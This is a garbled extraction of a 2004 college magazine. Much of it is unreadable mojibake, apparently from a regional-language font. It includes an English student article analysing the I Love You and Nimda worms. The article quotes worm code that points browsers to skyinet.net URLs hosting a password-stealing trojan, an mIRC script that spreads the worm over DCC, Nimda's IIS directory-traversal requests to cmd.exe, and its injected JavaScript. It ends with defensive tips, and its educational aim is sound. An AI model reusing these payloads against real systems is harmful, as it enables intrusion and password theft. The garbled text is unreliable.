aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 41: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn 